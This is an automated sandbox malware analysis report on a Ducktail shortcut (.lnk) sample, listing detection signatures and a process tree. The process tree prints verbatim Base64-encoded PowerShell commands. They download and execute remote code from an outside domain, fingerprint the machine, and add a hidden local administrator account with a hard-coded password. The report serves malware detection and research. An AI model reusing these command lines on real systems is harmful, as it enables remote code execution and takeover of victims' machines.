Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
U82W1yZAYQ.lnk

Overview

General Information

Sample name:U82W1yZAYQ.lnk
Analysis ID:1551865
MD5:84f772fa4275d74d461040a5ccfc5495
SHA1:256927916a8fb5104bb8d8212b29612ba399164e
SHA256:61a836854f32b7bc4d18564cf1447be068795df7f2d47034d95f48f971fb60d7
Infos:

Detection

Ducktail
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Ducktail
Allows multiple concurrent remote connection
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Modifies security policies related information
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cmd.exe (PID: 3200 cmdline: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2012 cmdline: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 6236 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 1784 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES352B.tmp" "c:\Users\user\AppData\Local\Temp\vz2enilj\CSC2427E8DFE2D64B98811230F26E9EEEB4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • powershell.exe (PID: 3608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • WINWORD.EXE (PID: 6580 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o "" MD5: E7F3B8EA1B06F46176FC5C35307727D6)
      • cmd.exe (PID: 2296 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 3372 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 8772 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • sppsvc.exe (PID: 8648 cmdline: C:\Windows\system32\sppsvc.exe MD5: 30C7EF47B57367CC546173BB4BB2BB04)
  • svczHost.exe (PID: 9104 cmdline: C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com MD5: EB57894A8FF610DF55C97E427D0DDD7B)
    • conhost.exe (PID: 9112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9172 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 3156 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8392 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • powershell.exe (PID: 5616 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5736 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
